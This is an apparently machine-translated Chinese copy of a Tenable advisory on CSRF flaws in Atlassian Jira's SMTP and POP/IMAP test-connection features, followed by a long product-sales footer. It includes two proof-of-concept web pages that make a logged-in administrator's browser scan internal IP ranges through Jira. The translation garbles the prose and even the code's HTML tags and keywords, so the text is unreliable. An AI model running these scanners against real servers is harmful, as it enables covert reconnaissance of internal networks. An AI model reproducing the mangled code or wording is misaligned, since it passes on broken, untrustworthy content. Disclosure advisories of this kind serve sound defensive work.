脸谱网 Google + 推特 LinkedIn YouTube RSS 菜单 搜索 资源——博客 资源-网络研讨会 资源-报告 资源-事件 icons_066 icons_067 icons_068 icons_069 icons_070

Atlassian Jira多个CSRF

媒介

剧情简介

站得住脚的发现了几个CSRF问题Atlassian Jira 8.7.0之前版本

cve - 2019 - 20098: CSRF通过SMTP服务器连接测试

配置SMTP服务器连接时,“测试连接”功能不正确验证介绍人或atl_token属性。这允许CSRF可以列举JIRA可用主机服务器。我们的研究人员创造了一个主机发现网页作为一个概念证明。

< html > <头> < meta name =“referrer”内容=“no-referrer”> < /头> <身体> < h2 > CSRF主机发现扫描仪通过SMTP服务器< / h2 > < p > <按钮onclick = " startScan ()" > < /扫描按钮> < br > < textarea id =“文本区域”行= 34 50关口= > < / textarea > < >脚本函数startScan () {. getelementbyid(“文本区域”value = " ");扫描(220、250、25);}函数扫描(ip1、ip2、港口){var计时器= 0;var xhttp = new XMLHttpRequest ();xhttp。{如果(xhttp onreadystatechange = function ()。readyState = = 1){计时器= Date.now ();如果(xhttp}其他。readyState = = 4){计时器= Date.now()——定时器;. getelementbyid(“文本区域”)。价值+ =”\捏:“+ scanIp +“\ tResponse时间:”+时间+“女士”; if (ip1 < ip2) { scan(ip1 + 1, ip2, port); } } else { document.getElementById("textarea").value += "\nip: " + scanIp + "\tReadyState = " + xttp.readyState + "\n"; } } var scanIp = "[ip_address_minus_lower_octet]" + ip1.toString(); data = "name=bob&description=desc&from=bob%40email.com&prefix=prefix&protocol=smtp&serverName=" + scanIp + "&port=" + port.toString() + "&timeout=10000&username=&password=&jndiLocation=&id=10000&type=smtp"; xhttp.open("POST", "http://[ipaddress]:8080/secure/admin/VerifySmtpServerConnection!update.jspa", true); xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhttp.withCredentials = true; xhttp.send(data); }  
Baidu

这段代码生成一个请求Jira服务器验证的SMTP服务器连接的IP地址范围。过渡时期之间的延迟readyState脚本从1到4,和文章在web页面的文本。完成后,这个页面将显示主机的列表和他们的响应时间。主机,超时或反应时间过长被认为是下降,而现有的主机将回应相对较快。在我们的测试中,我们发现这个工具与其他主机是可靠的和一致的枚举nmap等工具。

cve - 2019 - 20099: CSRF通过POP / IMAP邮件连接测试

与上面类似,CSRF存在于测试连接功能在创建POP和IMAP连接。下面的脚本创建演示这个缺陷:

< html > <头> < meta name =“referrer”内容=“no-referrer”> < /头> <身体> < h2 > CSRF主机发现扫描仪通过POP3服务器< / h2 > < p > <按钮onclick = " startScan ()" > < /扫描按钮> < br > < textarea id =“文本区域”行= 34 50关口= > < / textarea > < >脚本函数startScan () {. getelementbyid(“文本区域”value = " ");扫描(220、250、110);}函数扫描(ip1、ip2、港口){var计时器= 0;var xhttp = new XMLHttpRequest ();xhttp。{如果(xhttp onreadystatechange = function ()。readyState = = 1){计时器= Date.now ();如果(xhttp}其他。readyState = = 4){计时器= Date.now()——定时器;. getelementbyid(“文本区域”)。价值+ =”\捏:“+ scanIp +“\ tResponse时间:”+时间+“女士”; if (ip1 < ip2) { scan(ip1 + 1, ip2, port); } } else { document.getElementById("textarea").value += "readyState = " + xttp.readyState + "\n"; } } var scanIp = "[ipaddress_without_lower_octet]" + ip1.toString(); data = "name=u&description=u&serviceProvider=custom&protocol=pop3&serverName=" + scanIp + "&port=" + port.toString() + "&timeout=10000&username=admin&changePassword=true&password=test123&type=pop"; xhttp.open("POST", "http://[ipaddress]:8080/secure/admin/VerifyPopServerConnection!add.jspa", true); xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); xhttp.withCredentials = true; xhttp.send(data); }  
Baidu

解决方案

升级到8.7.0或以上

披露时间表

2019年10月15日—站得住脚的伸出Atlassian专用安全联系。
2019年10月15日—从Atlassian支持自动回复。
2019年10月15日—Atlassian州他们转发查询他们的安全团队。
2019年10月16日—Atlassian转发我们BugCrowd。
2019年10月16日,站得住脚的解释了为什么是不够的。
2019年10月16日—Atlassian要求我们提交一个支持的票。
2019年10月16日—Atlassian提供了一个安全联系。
2019年10月28日—站得住脚的披露问题。(90年1月28日标志着天)
2019年10月28日—Atlassian发送一个自动应答。指定秒- 2250。
2019年的10月28日- Atlassian拒绝2问题,为其他2问题提供追踪号码。
2019年10月30日,成立之前。
2019年11月14日—站得住脚的请求状态更新。
2019年12月7日——站得住脚的请求状态更新。
2019年12月9日,Atlassian关闭的机票和标志解决没有解释。
2019年12月9日—站得住脚的请求的状态更新和提醒Atlassian披露政策。
2019年12月17日,成立使得Atlassian头的安全调查。
2019年12月17日—Atlassian头安全响应和本产品经理的消息。
2019年12月18日,Atlassian产品经理的反应和产品安全管理器信息副本。
2019年12月21日,Atlassian产品安全经理回应额外的分类信息。
2020年1月6日——站得住脚的承认响应和请求状态更新。
2020年1月8日- Atlassian分配cf。
2020年1月9日—Atlassian请求扩展到3月。
2020年1月9日—站得住脚的拒绝请求。
2020年1月9日—Atlassian州他们无法满足最后期限。
2020年1月27日—Atlassian请求扩展到2月17日。
2020年1月28日,Atlassian州他们可以通过2月3日补丁。
2020年1月28日-站得住脚的赠款延长2周。
2020年2月3日——站得住脚的伸出Atlassian补丁是否包含在最新Jira释放。
2020年2月3日,Atlassian承认补丁都包括在内。

交易报告内的所有信息提供了“是”,没有任何形式的保证,包括适销性的隐含保证和健身为特定目的,并没有保证的完整性、准确性、及时性。个人和组织负责评估任何实际或潜在的安全漏洞的影响。

站得住脚的非常重视产品安全。如果你认为你已经找到一个漏洞在一个我们的产品,我们要求您请与我们共同努力,快速解决它为了保护客户。站得住脚的相信迅速应对这样的报道,与研究人员保持沟通,并提供解决方案。

提交漏洞信息的更多细节,请参阅我们的漏洞报告指南页面。

如果你有问题或修正咨询,请电子邮件(电子邮件保护)

风险信息

成立咨询ID
- 2020 - 05
信贷

亚历克斯·佩纳

CVSSv2基地/时间的分数
4.6/3.8
CVSSv2向量
AV: N /交流:H /非盟:S / C: P / I: P / A: P
更多关键字
sec - 2250
jraserver - 70427
jraserver - 70428
受影响的产品
Atlassian Jira 8.7.0之前
风险因素
媒介

咨询时间

2020年2月3日——最初版本
2020年2月19日—固定几个拼写错误

站得住脚的脆弱性管理

以前Tenable.io


享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

站得住脚的脆弱性管理

以前Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试成立Nessus专业免费的

免费7天

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。

新成立Nessus专家
现在可用

Nessus专家增添了更多的功能,包括外部攻击表面扫描,和添加域和扫描云基础设施的能力。点击这里尝试Nessus专家。

填写下面的表格继续Nessus Pro的审判。

买站得住脚的Nessus专业

站得住脚的Nessus是当今市场上最全面的漏洞扫描器。站得住脚的Nessus专业将帮助自动化漏洞扫描过程,节省时间在你的合规周期,让你与你的团队。

买一个多年的许可并保存。高级支持访问添加到手机、社区和聊天支持一天24小时,一年365天。

选择您的许可

买一个多年的许可并保存。

添加的支持和培训

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。

你站得住脚的脆弱性管理试验Lumin还包括成立,成立网络应用扫描和站得住脚的云安全。

Tenable.io

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

65年资产

选择你的订阅选项:

现在购买

尝试站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问我们的最新的web应用程序扫描提供专为现代应用程序的一部分的一个管理平台。安全扫描整个在线组合漏洞具有高精确度没有重体力工作或中断关键web应用程序。现在报名。

你站得住脚的Web应用程序扫描试验还包括站得住脚的脆弱性管理,成立Lumin站得住脚的云安全。

买站得住脚的Web应用程序扫描

以前Tenable.ioWeb Application Scanning

享受完全访问一个现代的、基于云的脆弱性管理平台,使您能够看到并追踪你所有的资产与无与伦比的精度。今天购买你的年度订阅。

5 fqdn

3578美元

现在购买

尝试成立Lumin

可视化和探索你的风险管理,跟踪风险降低随着时间的推移和基准与站得住脚的Lumin你的同行。

你站得住脚的Lumin审判还包括站得住脚的脆弱性管理,站得住脚的Web应用程序扫描和站得住脚的云安全。

买站得住脚的Lumin

联系销售代表如何站得住脚的Lumin可以帮助你了解你的整个组织和管理网络的风险。

尝试站得住脚的云安全

以前Tenable.cs

享受完全访问检测和修复云基础设施配置错误和查看运行时的漏洞。现在注册你的免费试用。了解更多关于审判过程请点击这里。

你站得住脚的云安全试验还包括站得住脚的脆弱性管理,成立Lumin和站得住脚的Web应用程序扫描。

联系销售代表购买站得住脚的云安全

联系销售代表来了解更多关于站得住脚的云安全,看是多么容易机载云账户和获得可见性都几分钟内云配置错误和漏洞。

尝试成立Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经成立Nessus专业吗?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

尝试Nessus专家免费

免费7天

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

已经有了Nessus专业?
升级到Nessus专家免费7天。

买站得住脚的Nessus专家

现代修建的攻击表面,Nessus专家使您能够看到更多和保护您的组织从漏洞从云。

选择您的许可

买一个多年的执照和存更多的钱。

添加的支持和培训

Baidu
map